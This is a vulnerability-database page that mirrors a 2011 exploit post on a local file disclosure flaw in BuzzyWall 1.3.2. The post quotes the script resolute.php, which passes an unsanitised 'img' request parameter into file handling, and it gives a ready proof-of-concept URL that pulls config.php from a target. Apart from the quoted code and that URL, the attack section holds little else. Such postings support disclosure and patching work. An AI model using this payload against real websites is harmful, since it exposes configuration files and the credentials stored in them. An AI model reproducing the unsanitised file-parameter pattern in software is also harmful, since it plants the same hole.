Lucene search
K

BuzzyWall 1.3.2 File Disclosure

🗓️ 07 Oct 2011 00:00:00Reported by cr4wl3rType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 18 Views

BuzzyWall 1.3.2 File Disclosure exploit foun

Code
`[~] BuzzyWall 1.3.2 (resolute.php) Local File Disclosure Exploit  
[~] Found by cr4wl3r @hackb0x  
[~] d0rk: no d0rk f0r kiddi0ts  
[~] Script: http://sourceforge.net/projects/buzzywall/files/buzzywall/  
  
err0r c0de resolute.php  
  
<?PHP  
header ("Content-type: image/jpeg");  
  
$img = $_GET['img'];  
header('Content-Disposition: attachment; filename="'.$img.'"');  
$percent = $_GET['percent'];  
$constrain = $_GET['constrain'];  
$w = $_GET['w'];  
$h = $_GET['h'];  
  
....  
  
[~] p0c: http://target/resolute.php?img=config.php  
  
thx: valentin, xoron, irvian, cyberlog, EA ngel, Minato  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation